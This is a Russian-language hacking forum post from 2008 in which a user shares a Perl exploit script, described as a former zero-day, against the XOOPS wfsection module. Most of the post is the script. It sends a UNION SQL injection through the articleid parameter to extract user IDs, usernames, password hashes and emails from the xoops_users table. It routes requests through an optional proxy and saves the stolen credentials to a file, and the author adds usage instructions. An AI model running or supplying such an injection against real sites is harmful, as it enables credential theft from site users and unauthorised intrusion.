[xoops - Exploit]

Discussion in 'Веб-уязвимости' started by .Slip, 12 May 2008.

  1. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Бывший 0дэй в пределах моего харда (мб). Сейчас уже актуальность утеряна, стало быть выкладываю сюда. Писал не особо кропотливо, любители доебаться к коду -> go2cock. Есть поддержка хттп проксей, онли хттп ибо не хотелось ебли со скачкой доп либ для соксов (у меня их небыло=\). А уж LWP полный есть уже у всех имхо.

    Code:
    #!/usr/bin/perl

use LWP::UserAgent;
&header;

         if((@ARGV<1) or (@ARGV>2)){&usage;}
         my $url=$ARGV[0];
                 if(!$ARGV[1]){print "\n\n[!] Exploit works without proxy!";}
                 else {$proxy=$ARGV[1]; print "\n\n[+] Exploit works with proxy: ",$ARGV[1];}

         print "\n[~] Trying get uid, uname, pass, email\n";

         $ua=LWP::UserAgent->new or die;
         $ua->agent("Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)");
                 
		 if($proxy){$ua->proxy('http',"http://".$proxy."/");}

         my $omfg = $ua->get("http://$url/wfsection/article.php?articleid=-28+union+select+1,2,3,concat(0x232323,uid,0x3a,uname,0x3a,pass,0x3a,email,0x232323),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+xoops_users+limit+0,1--")->content;
         $omfg =~m%###(.*?)###%i;
         my $bla = $1;
	 
	 if (!$bla) {print "[!] Exploit Failed!\n";}
	 else {print "[+] Complete!\n\n [uid:uname:pass:email]\n";
	       print $bla;
               open (F,">","omfg.txt") or die "$!";
               print F $bla,"\n\nHave Fun, hacker:d\n\n[h0mepage: slip.netsec.ru, email: [email protected]]";
               close F;}

         sub header
	 {print q(
               _        _                _____ _ _       
              | |      | |              / ____| (_)      
  ___ ___   __| | ___  | |__  _   _    | (___ | |_ _ __  
 / __/ _ \ / _` |/ _ \ | '_ \| | | |    \___ \| | | '_ \ 
| (_| (_) | (_| |  __/ | |_) | |_| |  _ ____) | | | |_) |
 \___\___/ \__,_|\___| |_.__/ \__, | (_)_____/|_|_| .__/ 
                               __/ |              | |    
                              |___/               |_|
			      
[h0mepage: slip.netsec.ru, email: [email protected]])}
         
sub usage{
print q(
usage:	   perl expl.pl <url> <proxy>

example:   perl expl.pl www.site.hosting1.com/modules 127.0.0.1:81

or:	   perl expl.pl www.site.hosting1.com/modules - without proxy);
exit(0);
}
    Впринципе в usage всё понятно описано, но добавлю, ОБЯЗАТЕЛЬНО написать путь до папки с модулями, именно в таком виде как написанное в usage. Если напишите не так, нихера не будет работать. Так же результаты хэка сохраняет в файл omfg.txt в той директории, откуда был запущен скрипт. В аттаче сам сплойт.
     

    Attached Files:

    #1 .Slip, 12 May 2008
    4 people like this.
(You must log in or sign up to post here.)
Language
English (US)
    ANTICHAT ™ © 2001-2027 Antichat Kft.